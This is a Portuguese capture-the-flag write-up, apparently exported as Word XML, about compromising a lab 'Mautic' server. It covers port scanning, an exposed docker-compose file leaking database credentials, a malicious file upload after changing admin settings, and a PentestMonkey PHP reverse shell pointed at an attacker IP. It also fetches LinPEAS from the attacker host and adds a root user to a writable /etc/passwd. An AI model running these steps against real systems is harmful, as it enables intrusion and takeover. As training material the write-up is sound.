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360" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_id06xjcrabty" w:id="0"/>
      <w:bookmarkEnd w:id="0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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3t8m4axx4m2o" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Introdução</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex San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Este write-up é referente a máquina </w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mautic</w:t>
        </w:r>
      </w:hyperlink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 Caso precise de suporte, favor abrir um ticket no </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">canal de suporte no servidor do Discord</w:t>
        </w:r>
      </w:hyperlink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7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cahrt67n5qzp" w:id="2"/>
      <w:bookmarkEnd w:id="2"/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36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconhecimento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Iniciaremos este projeto com a fase de reconhecimento, realizando a coleta de informações sobre o ambiente alvo. Realizaremos a enumeração de portas para identificar serviços ativos e expostos no ambiente alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009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$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bash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~/tools/enumport/script.sh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172.16.2.98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Enumerando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portas....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Portas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abertas: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22,8000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Verificando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Serviços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Starting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Nmap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7.94SVN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https://nmap.org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2025-06-20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14:33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-03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Nmap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scan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report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172.16.2.98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Host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(0.15s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latency).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PORT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SERVICE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VERSION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22/tcp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open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ssh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OpenSSH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9.6p1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Ubuntu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3ubuntu13.11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(Ubuntu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Linux;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protocol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2.0)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ssh-hostkey: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1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256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58:81:e7:97:d2:5f:79:04:72:bf:d1:46:ff:fa:37:1d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(ECDSA)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|_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256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a2:f0:1e:33:33:a0:57:b8:a0:f6:cb:dd:cc:80:40:3c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(ED25519)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8000/tcp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open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http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Apache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httpd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2.4.38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http-robots.txt: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9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disallowed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entries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1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/addons/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/plugins/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/app/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/media/dashboards/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1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/media/files/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/media/js/mautic-form-src.js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/themes/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/translations/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1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|_/vendor/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|_http-open-proxy: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Proxy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might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redirecting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requests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|_http-server-header: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Apache/2.4.38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(Debian)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http-title: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Mautic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|_Requested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resource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http://172.16.2.98:8000/index.php/s/login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Service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Info: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Host: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172.18.0.3;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Linux;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CPE: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cpe:/o:linux:linux_kernel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Service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detection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performed.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Please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report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incorrect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results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https://nmap.org/submit/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Nmap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done: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address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(1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host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up)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scanned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43.74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seconds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40" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Obs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i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Para enumeração de portas e serviços utilizamos o script personalizado juntamente com Nmap:</w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink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https://github.com/fstringuetta/enumport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gquey8yl7hln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Configuração do arquivo hosts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026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Para facilitar a resolução de nomes, adicionamos o domínio diretamente no arquivo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hosts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7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$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echo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'172.16.2.98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mautic.hc'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sudo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tee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/etc/hosts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172.16.2.98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mautic.hc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u7e311heiii" w:id="4"/>
      <w:bookmarkEnd w:id="4"/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Enumeração HTTP porta 8000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B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Assim que acessamos o serviço HTTP que está sendo executado na porta 8000 temos a seguinte tela.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:spacing w:after="240" w:before="24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853113" cy="2926556"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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53113" cy="2926556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Vamos efetuar uma enumeração em busca de arquivos e diretórios que possam supostamente estarem ocultos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E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$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ffuf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/usr/share/seclists/Discovery/Web-Content/quickhits.txt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-u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http://mautic.hc:8000/FUZZ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-ac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/'___\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/'___\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/'___\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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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/\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\__/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/\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\__/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__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__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/\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\__/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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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\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\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,__\\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\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,__\/\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\/\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\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\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\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,__\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</w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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\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\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\_/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\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\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\_/\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\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\_\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\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\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\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\_/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</w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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\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\_\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\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\_\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\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\____/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\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\_\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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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\/_/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\/_/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\/___/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\/_/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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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v2.1.0-dev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::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Method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::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URL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http://mautic.hc:8000/FUZZ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::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Wordlist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FUZZ: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/usr/share/seclists/Discovery/Web-Content/quickhits.txt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::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Follow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redirects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true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::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Calibration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true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::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Timeout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::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Threads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40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::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Matcher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Response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status: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200-299,301,302,307,401,403,405,500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docker-compose.yml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[Status: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200,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Size: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430,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Words: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101,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Lines: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27,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Duration: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148ms]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LICENSE.txt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[Status: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200,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Size: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38407,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Words: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6399,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Lines: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770,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Duration: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152ms]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upgrade.php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[Status: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200,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Size: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705,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Words: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77,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Lines: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14,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Duration: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151ms]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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Identificamos a existência de dois arquivos sendo eles </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="eb5757"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">docker-compose.yml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rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="eb5757"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upgrade.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Efetuamos o download de ambos arquivos para nosso host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049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$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wget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http://mautic.hc:8000/docker-compose.yml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--2025-06-20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14:47:14--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http://mautic.hc:8000/docker-compose.yml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Resolving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mautic.hc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(mautic.hc)...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172.16.2.98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Connecting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mautic.hc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(mautic.hc)|172.16.2.98|:8000...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connected.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HTTP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request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sent,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awaiting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response...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200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Length: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430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Saving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‘docker-compose.yml’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docker-compose.yml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      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100%[========================================================================================================================================&gt;]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430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--.-KB/s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0s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</w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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2025-06-20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14:47:15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(64,9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MB/s)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‘docker-compose.yml’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saved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[430/430]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$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wget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http://mautic.hc:8000/upgrade.php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--2025-06-20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14:47:21--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http://mautic.hc:8000/upgrade.php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Resolving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mautic.hc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(mautic.hc)...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172.16.2.98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Connecting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mautic.hc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(mautic.hc)|172.16.2.98|:8000...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connected.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HTTP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request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sent,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awaiting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response...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200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Length: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705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[text/html]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Saving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‘upgrade.php’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upgrade.php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             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100%[========================================================================================================================================&gt;]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705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--.-KB/s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0s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</w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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2025-06-20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14:47:22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(104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MB/s)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‘upgrade.php’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saved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[705/705]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jc w:val="both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62">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Assim que efetuamos o download de ambos arquivos efetuando a analise, identificamos que no arquivo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="eb5757"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.yml</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> existe possíveis credenciais em texto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063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version: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'3.8'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services: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mautic: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build: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ports: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"8000:80"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volumes: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./mautic_data:/var/www/html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depends_on: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db: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image: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mariadb:10.4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restart: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always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environment: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MYSQL_ROOT_PASSWORD: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root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MYSQL_DATABASE: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mautic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MYSQL_USER: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mautic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MYSQL_PASSWORD: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cUy1RjfCvF4yOJaln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volumes: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./db_data:/var/lib/mysql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volumes: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mautic_data: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db_data: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Durante as atividades de análise, foram realizadas pesquisas sobre vulnerabilidades conhecidas na aplicação </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mautic</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Identificamos a existência da vulnerabilidade </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2024-47051</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, a qual permite a execução remota de comandos (RCE) de forma autenticada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_p3gpb9kz3yl" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploração</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080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Utilizando as credenciais obtidas em arquivos acessíveis, foi possível realizar a autenticação com sucesso na aplicação, garantindo acesso ao painel administrativo (dashboard). Esse acesso viabilizou a exploração da vulnerabilidade mencionada, ampliando significativamente o impacto do comprometimento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081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786438" cy="2809761"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="7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86438" cy="2809761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Apesar da existência de uma vulnerabilidade catalogada para a aplicação, não foi identificado nenhum exploit público viável para exploração direta da falha. No entanto, considerando que o acesso ao painel administrativo foi obtido com privilégios elevados, foi possível </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">modificar</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> configurações sensíveis da aplicação, como:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Alteração da lista de extensões de arquivos permitidas para upload, possibilitando o envio de arquivos potencialmente maliciosos;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Modificação do caminho de armazenamento ****(path) dos arquivos, facilitando o acesso remoto ao payload enviado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085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Esse cenário evidencia como o simples acesso administrativo à aplicação pode ser suficiente para comprometer a infraestrutura, mesmo sem a exploração direta de vulnerabilidades conhecidas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086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892233" cy="1775224"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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92233" cy="1775224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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Assim que realizamos as alterações necessárias nas configurações da aplicação Mautic incluindo a liberação da extensão do arquivo malicioso e a modificação do caminho de armazenamento, podemos avançar para o cadastro de um novo Componente (Asset), funcionalidade legítima da aplicação. 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/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5843588" cy="2032145"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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43588" cy="2032145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0" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Para recebermos nossa conexão reversa iremos utilizar o script em PHP do projeto PentestMonkey.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B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set_time_limit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(0);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$VERSION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"1.0";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$ip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'10.0.15.12';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CHANGE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$port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9001;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CHANGE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$chunk_size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1400;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$write_a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null;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$error_a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null;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$shell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'uname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-a;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id;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/bin/sh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-i';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$daemon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0;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$debug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0;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97">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/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Link de referência:</w:t>
      </w:r>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink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https://pentestmonkey.net/tools/web-shells/php-reverse-shell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Após o envio do arquivo malicioso pela aplicação, é necessário identificar o novo nome atribuído automaticamente pelo Mautic. Para isso, basta acessar a opção </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“Details”</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> do asset, onde é exibido o nome final e o caminho do arquivo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000099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841369" cy="3070463"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="3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41369" cy="3070463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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Como o caminho de salvamento do arquivo foi alterado previamente, podemos acessá-lo diretamente utilizando o endereço configurado, conforme identificado na opção “Details” do asset.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/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5843588" cy="1872945"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="14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43588" cy="1872945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240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both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Obs: Conexão reversa recebida através do script</w:t>
      </w:r>
      <w:hyperlink r:id="rId18">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:iCs w:val="1"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId19">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:iCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Penelope</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A0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Logo após obtermos acesso reverso ao ambiente, com uma shell interativa estabelecida, foi possível identificar a primeira evidência localizada diretamente na raiz do sistema de arquivos </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1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/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1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843588" cy="1245508"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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43588" cy="1245508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1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rdi31yr2ipxw" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pós-Exploração</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A4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Para darmos continuidade ao processo de pós-exploração do ambiente, realizaremos a transferência do script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LinPEAS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, com o objetivo de identificar possíveis vetores de escalonamento de privilégios verticais dentro do sistema comprometido.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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$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curl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10.0.15.12/linpeas.sh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linpeas.sh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%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Total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%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Received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%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Xferd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Average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Speed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Time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Time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Time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Current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Dload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Upload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Total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Spent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Left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Speed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100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810k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100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810k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384k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0:00:02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0:00:02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--:--:--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384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Após a transferência do script, foram atribuídas as permissões de execução necessárias e iniciada sua execução. Ao final da análise, o LinPEAS indicou dois pontos relevantes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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O ambiente em questão está sendo executado dentro de um </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">container</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Docker);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Foi identificado um possível vetor de escalonamento de privilégios que pode permitir a elevação para o usuário root dentro do container.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/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5862638" cy="1813284"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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62638" cy="1813284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jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Identificamos que o arquivo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="eb5757"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> está com permissões de escrita, o que permite, neste cenário, adicionar um novo usuário com privilégios de root diretamente no sistema, facilitando a elevação de privilégios.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE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$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openssl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passwd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-1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-salt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"hacker"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"password123"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$1$hacker$maoVUGb6XNp03USLr9Oqq1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$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echo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'hacker:$1$hacker$maoVUGb6XNp03USLr9Oqq1:0:0:root:/root:/bin/bash'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&gt;&gt;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/etc/passwd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B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Com o usuário inserido no arquivo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="eb5757"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passwd</w:t>
      </w:r>
